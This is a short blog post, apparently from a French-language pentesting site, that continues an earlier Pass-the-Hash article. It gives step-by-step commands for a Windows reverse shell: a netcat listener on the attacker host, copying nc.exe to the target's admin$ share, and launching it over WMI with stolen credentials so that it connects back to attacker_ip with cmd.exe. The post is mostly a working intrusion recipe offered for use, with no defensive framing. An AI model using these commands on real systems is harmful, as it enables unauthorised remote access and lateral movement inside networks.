Oct 282019

In a previous article, we have seen how to perform lateral movement thru « Pass The Hash ».

Lets imagine that there is no RDP server available on the target but you still need to get a shell on the target.

Lets use a reverse shell i.e the target will connect back to us (the attacker).

Usefull as well if the firewall on the target is allowing only outbound connections.

1.Set a shell with netcat on the attacker host
nc -L -vv -p 9000

2.Copy file to target host (remember, you are using a pth shell with proper logon details).
copy nc.exe \\target\admin$

3.Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:nc attacker_ip 9000 -e cmd.exe

At this point you will get a shell popup in your listening netcat.

Try a simple whoami for fun.

Poster un Commentaire


Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.

Notifier de